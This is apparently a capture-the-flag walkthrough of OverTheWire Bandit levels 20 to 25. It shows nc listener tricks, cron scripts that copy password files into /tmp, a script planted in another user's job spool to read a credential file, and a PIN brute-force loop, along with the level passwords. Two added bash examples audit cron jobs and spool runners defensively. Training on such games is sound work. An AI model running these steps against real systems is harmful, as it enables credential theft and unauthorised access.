Level 20 → Level 21
Level Goal
There is a setuid binary in the home directory that does the following: it makes a connection to localhost on the port you specify as a command-line argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: Try connecting to your own network daemon to see if it works as you think
$ ssh bandit20@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit20@bandit.labs.overthewire.org's password: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Solution
bandit20@bandit:~$ echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 33333 &
[1] 25823
bandit20@bandit:~$ ./suconnect 33333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Level 21 → Level 22
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
$ ssh bandit21@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit21@bandit.labs.overthewire.org's password:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Solution
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22 → Level 23
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
$ ssh bandit22@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit22@bandit.labs.overthewire.org's password:
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Solution
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls -l
total 24
-rw-r--r-- 1 root root 62 May 14 13:40 cronjob_bandit15_root
-rw-r--r-- 1 root root 62 Jul 11 15:56 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May 7 20:14 cronjob_bandit22
-rw-r--r-- 1 root root 122 May 7 20:14 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 09:41 cronjob_bandit24
-rw-r--r-- 1 root root 62 May 14 14:04 cronjob_bandit25_root
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
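Levels 21 and 22 both come down to a cron job that copies a secret into /tmp under a name any user can read or derive. The manual inspection above, written as a repeatable check, is an added example and not code from the original post or from OverTheWire; the function names, cronjob_ok and rotate.sh are made up, and the fixture is constructed from the listings above.

```bash
#!/bin/bash
# Added example, not from the original post. cronjob_ok and rotate.sh are
# made-up names; the bandit22 files are copied from the listing above.

# make_fixture ROOT: build a constructed sample tree under ROOT.
make_fixture() {
    mkdir -p "$1/etc/cron.d" "$1/usr/bin"
    printf '%s\n' '# constructed sample' 'MAILTO=root' \
        '@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null' \
        '* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null' \
        > "$1/etc/cron.d/cronjob_bandit22"
    printf '%s\n' '#!/bin/bash' \
        'chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv' \
        'cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv' \
        > "$1/usr/bin/cronjob_bandit22.sh"
    printf '%s\n' '0 3 * * * root /usr/bin/rotate.sh' > "$1/etc/cron.d/cronjob_ok"
    printf '%s\n' '#!/bin/bash' 'logger "rotation done"' > "$1/usr/bin/rotate.sh"
}

# list_cron_jobs FILE: print "user command" for each job line in a cron.d file.
list_cron_jobs() {
    awk '/^[ \t]*(#|$)/ { next }              # comment or blank line
         $1 ~ /^@/ { print $2, $3; next }     # @reboot user command
         NF >= 7   { print $6, $7 }           # m h dom mon dow user command
    ' "$1"
}

# audit_cron_tmp_writes ROOT: print "user script" once for every job whose
# script redirects (> or >>) into /tmp. Pass "" as ROOT on a live system.
audit_cron_tmp_writes() {
    for f in "$1"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        list_cron_jobs "$f" | while read -r user cmd; do
            case $cmd in /*) ;; *) continue ;; esac   # absolute paths only
            [ -f "$1$cmd" ] || continue
            if grep -Eq '>>?[[:space:]]*/tmp/' "$1$cmd"; then
                printf '%s %s\n' "$user" "$cmd"
            fi
        done
    done | sort -u
}
```
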
Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
$ ssh bandit23@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit23@bandit.labs.overthewire.org's password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Solution
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
Approach
Create a directory under /tmp/. Create a shell script that copies /etc/bandit_pass/bandit24 into that directory. Copy the shell script to /var/spool/bandit24/. Give the shell script and the directory under /tmp/ appropriate permissions.
bandit23@bandit:~$ mkdir /tmp/abc
bandit23@bandit:~$ cd /tmp/abc
bandit23@bandit:/tmp/abc$ cat > abc.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> /tmp/abc/pass24
bandit23@bandit:/tmp/abc$ chmod 777 /tmp/abc
bandit23@bandit:/tmp/abc$ chmod 777 abc.sh
bandit23@bandit:/tmp/abc$ cp abc.sh /var/spool/bandit24/
--------------after some time -------------------
bandit23@bandit:/tmp/abc$ cat pass24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
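The cron script for this level runs, as bandit24, files that other users drop into /var/spool/bandit24. The checks a job runner can make before executing a spooled file are shown here as an added example, not the game's script; the function names and the acceptance rules are assumptions.

```bash
#!/bin/bash
# Added example, not the game's script: checks a job runner can make before
# executing a file found in a spool directory. Names and rules are assumptions.

# writable_by_others PATH: true if the group- or other-write bit is set.
writable_by_others() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# owned_by PATH OWNER: true if PATH belongs to OWNER (user name or numeric uid).
owned_by() {
    [ -n "$(find "$1" -prune -user "$2" -print 2>/dev/null)" ]
}

# safe_to_run FILE OWNER: print "ok" and return 0, or print the reason and return 1.
safe_to_run() {
    if [ -L "$1" ] || [ ! -f "$1" ]; then
        echo "refuse: not a regular file"; return 1
    fi
    if ! owned_by "$1" "$2"; then
        echo "refuse: not owned by $2"; return 1
    fi
    if writable_by_others "$1"; then
        echo "refuse: file is group/other-writable"; return 1
    fi
    if writable_by_others "$(dirname -- "$1")"; then
        echo "refuse: directory is group/other-writable"; return 1
    fi
    echo "ok"
}

# run_spool DIR OWNER: run only the files that pass, report the rest.
run_spool() {
    for f in "$1"/* "$1"/.[!.]*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        if verdict=$(safe_to_run "$f" "$2"); then
            timeout -s 9 60 "$f"
        else
            printf 'skipped %s (%s)\n' "$f" "$verdict"
        fi
    done
}
```

Under these rules the abc.sh from the walk-through is refused: it is owned by bandit23 rather than the job's own user, and chmod 777 leaves it writable by everyone.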
Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
$ ssh bandit24@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit24@bandit.labs.overthewire.org's password:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Solution
bandit24@bandit:~$ mkdir /tmp/aaaa
bandit24@bandit:~$ cd /tmp/aaaa
bandit24@bandit:/tmp/aaaa$ cat > abc.sh
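#!/bin/bash
# Write one "password pincode" line per 4-digit pincode.
# {0000..9999} keeps the leading zeros, so 0000 through 0999 are covered too.
for i in {0000..9999}
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
done > ./out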
bandit24@bandit:/tmp/aaaa$ chmod +x abc.sh
bandit24@bandit:/tmp/aaaa$ ./abc.sh
bandit24@bandit:/tmp/aaaa$ cat out | nc localhost 30002
-----------You will get password-----------
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
THANKS FOR READING ...!!